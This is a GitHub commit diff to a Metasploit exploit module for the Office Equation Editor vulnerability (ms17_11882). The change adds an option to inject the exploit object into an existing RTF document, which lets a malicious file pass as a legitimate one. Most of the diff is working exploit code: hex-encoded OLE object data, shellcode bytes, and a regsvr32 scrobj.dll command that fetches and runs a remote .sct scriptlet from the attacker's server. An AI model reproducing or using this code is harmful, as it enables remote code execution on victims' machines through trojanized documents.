Skip to content

Commit c788e4e

Browse files
author
Austin
authored
Update office_ms17_11882.rb
1 parent 7df46b3 commit c788e4e

File tree

1 file changed

+104
-77
lines changed

1 file changed

+104
-77
lines changed

modules/exploits/windows/fileformat/office_ms17_11882.rb

Lines changed: 104 additions & 77 deletions
Original file line numberDiff line numberDiff line change
@@ -46,88 +46,115 @@ def initialize(info = {})
4646
))
4747

4848
register_options([
49-
OptString.new("FILENAME", [true, "Filename to save as", "msf.rtf"])
49+
OptString.new("FILENAME", [true, "Filename to save as, or inject", "msf.rtf"]),
50+
OptString.new("FOLDER_PATH", [false, "Path to file to inject", nil])
5051
])
5152
end
5253

54+
def retrieve_header(filename)
55+
if (not datastore['FOLDER_PATH'].nil?)
56+
path = "#{datastore['FOLDER_PATH']}/#{datastore['FILENAME']}"
57+
else
58+
path = nil
59+
end
60+
if (not path.nil?)
61+
if ::File.file?(path)
62+
File.open(path, 'rb') do |fd|
63+
header = fd.read(fd.stat.size).split('{\*\datastore').first
64+
header = header.to_s # otherwise I get nil class...
65+
print_status("Injecting #{path}...")
66+
return header
67+
end
68+
else
69+
header = '{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Calibri;}}' + "\n"
70+
header << '{\*\generator Riched20 6.3.9600}\viewkind4\uc1' + "\n"
71+
header << '\pard\sa200\sl276\slmult1\f0\fs22\lang9'
72+
end
73+
else
74+
header = '{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Calibri;}}' + "\n"
75+
header << '{\*\generator Riched20 6.3.9600}\viewkind4\uc1' + "\n"
76+
header << '\pard\sa200\sl276\slmult1\f0\fs22\lang9'
77+
end
78+
return header
79+
end
80+
5381

5482

5583
def generate_rtf
56-
header = '{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Calibri;}}' + "\n"
57-
header << '{\*\generator Riched20 6.3.9600}\viewkind4\uc1' + "\n"
58-
header << '\pard\sa200\sl276\slmult1\f0\fs22\lang9{\object\objemb\objupdate{\*\objclass Equation.3}\objw380\objh260{\*\objdata '
59-
header << '01050000020000000b0000004571756174696f6e2e33000000000000000000000'
60-
header << 'c0000d0cf11e0a1b11ae1000000000000000000000000000000003e000300feff'
61-
header << '09000600000000000000000000000100000001000000000000000010000002000'
62-
header << '00001000000feffffff0000000000000000ffffffffffffffffffffffffffffff'
63-
header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
64-
header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
65-
header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
66-
header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
67-
header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
68-
header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
69-
header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
70-
header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
71-
header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
72-
header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
73-
header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
74-
header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
75-
header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffdffffff040'
76-
header << '00000fefffffffefffffffeffffffffffffffffffffffffffffffffffffffffff'
77-
header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
78-
header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
79-
header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
80-
header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
81-
header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
82-
header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
83-
header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
84-
header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
85-
header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
86-
header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
87-
header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
88-
header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
89-
header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
90-
header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
91-
header << 'ffffffffffffffffffffffffffffffffffffff52006f006f007400200045006e0'
92-
header << '07400720079000000000000000000000000000000000000000000000000000000'
93-
header << '00000000000000000000000000000000000016000500ffffffffffffffff02000'
94-
header << '00002ce020000000000c0000000000000460000000000000000000000008020ce'
95-
header << 'a5613cd30103000000000200000000000001004f006c006500000000000000000'
96-
header << '00000000000000000000000000000000000000000000000000000000000000000'
97-
header << '000000000000000000000000000000000a000201ffffffffffffffffffffffff0'
98-
header << '00000000000000000000000000000000000000000000000000000000000000000'
99-
header << '000000000000001400000000000000010043006f006d0070004f0062006a00000'
100-
header << '00000000000000000000000000000000000000000000000000000000000000000'
101-
header << '0000000000000000000000000000120002010100000003000000ffffffff00000'
102-
header << '00000000000000000000000000000000000000000000000000000000000000000'
103-
header << '0001000000660000000000000003004f0062006a0049006e0066006f000000000'
104-
header << '00000000000000000000000000000000000000000000000000000000000000000'
105-
header << '00000000000000000000000012000201ffffffff04000000ffffffff000000000'
106-
header << '00000000000000000000000000000000000000000000000000000000000000003'
107-
header << '0000000600000000000000feffffff02000000fefffffffeffffff05000000060'
108-
header << '0000007000000feffffffffffffffffffffffffffffffffffffffffffffffffff'
109-
header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
110-
header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
111-
header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
112-
header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
113-
header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
114-
header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
115-
header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
116-
header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
117-
header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
118-
header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
119-
header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
120-
header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
121-
header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
122-
header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
123-
header << 'ffffff01000002080000000000000000000000000000000000000000000000000'
124-
header << '00000000000000000000000000000000000000000000000000000000000000000'
125-
header << '00000100feff030a0000ffffffff02ce020000000000c00000000000004617000'
126-
header << '0004d6963726f736f6674204571756174696f6e20332e30000c00000044532045'
127-
header << '71756174696f6e000b0000004571756174696f6e2e3300f439b27100000000000'
128-
header << '00000000000000000000000000000000000000000000000000000000000000000'
129-
header << "00000300040000000000000000000000000000000000000000000000000000000"
130-
header << "000000000000000000000000000000000000000000000000000000000000000\n"
84+
header = retrieve_header(datastore['FILENAME'])
85+
object_class = '{\object\objemb\objupdate{\*\objclass Equation.3}\objw380\objh260{\*\objdata '
86+
object_class << '01050000020000000b0000004571756174696f6e2e33000000000000000000000'
87+
object_class << 'c0000d0cf11e0a1b11ae1000000000000000000000000000000003e000300feff'
88+
object_class << '09000600000000000000000000000100000001000000000000000010000002000'
89+
object_class << '00001000000feffffff0000000000000000ffffffffffffffffffffffffffffff'
90+
object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
91+
object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
92+
object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
93+
object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
94+
object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
95+
object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
96+
object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
97+
object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
98+
object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
99+
object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
100+
object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
101+
object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
102+
object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffdffffff040'
103+
object_class << '00000fefffffffefffffffeffffffffffffffffffffffffffffffffffffffffff'
104+
object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
105+
object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
106+
object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
107+
object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
108+
object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
109+
object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
110+
object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
111+
object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
112+
object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
113+
object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
114+
object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
115+
object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
116+
object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
117+
object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
118+
object_class << 'ffffffffffffffffffffffffffffffffffffff52006f006f007400200045006e0'
119+
object_class << '07400720079000000000000000000000000000000000000000000000000000000'
120+
object_class << '00000000000000000000000000000000000016000500ffffffffffffffff02000'
121+
object_class << '00002ce020000000000c0000000000000460000000000000000000000008020ce'
122+
object_class << 'a5613cd30103000000000200000000000001004f006c006500000000000000000'
123+
object_class << '00000000000000000000000000000000000000000000000000000000000000000'
124+
object_class << '000000000000000000000000000000000a000201ffffffffffffffffffffffff0'
125+
object_class << '00000000000000000000000000000000000000000000000000000000000000000'
126+
object_class << '000000000000001400000000000000010043006f006d0070004f0062006a00000'
127+
object_class << '00000000000000000000000000000000000000000000000000000000000000000'
128+
object_class << '0000000000000000000000000000120002010100000003000000ffffffff00000'
129+
object_class << '00000000000000000000000000000000000000000000000000000000000000000'
130+
object_class << '0001000000660000000000000003004f0062006a0049006e0066006f000000000'
131+
object_class << '00000000000000000000000000000000000000000000000000000000000000000'
132+
object_class << '00000000000000000000000012000201ffffffff04000000ffffffff000000000'
133+
object_class << '00000000000000000000000000000000000000000000000000000000000000003'
134+
object_class << '0000000600000000000000feffffff02000000fefffffffeffffff05000000060'
135+
object_class << '0000007000000feffffffffffffffffffffffffffffffffffffffffffffffffff'
136+
object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
137+
object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
138+
object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
139+
object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
140+
object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
141+
object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
142+
object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
143+
object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
144+
object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
145+
object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
146+
object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
147+
object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
148+
object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
149+
object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
150+
object_class << 'ffffff01000002080000000000000000000000000000000000000000000000000'
151+
object_class << '00000000000000000000000000000000000000000000000000000000000000000'
152+
object_class << '00000100feff030a0000ffffffff02ce020000000000c00000000000004617000'
153+
object_class << '0004d6963726f736f6674204571756174696f6e20332e30000c00000044532045'
154+
object_class << '71756174696f6e000b0000004571756174696f6e2e3300f439b27100000000000'
155+
object_class << '00000000000000000000000000000000000000000000000000000000000000000'
156+
object_class << "00000300040000000000000000000000000000000000000000000000000000000"
157+
object_class << "000000000000000000000000000000000000000000000000000000000000000\n"
131158

132159

133160
shellcode = "\x1c\x00" # 0: 1c 00 sbb al,0x0
@@ -215,7 +242,7 @@ def generate_rtf
215242
payload += "\x00" * 2
216243
payload += "regsvr32 /s /n /u /i:#{get_uri}.sct scrobj.dll"
217244
payload = (payload + ("\x00" * (197 - payload.length))).unpack('H*').first
218-
payload = header + payload + footer
245+
payload = header + object_class + payload + footer
219246
payload
220247
end
221248

0 commit comments

Comments
 (0)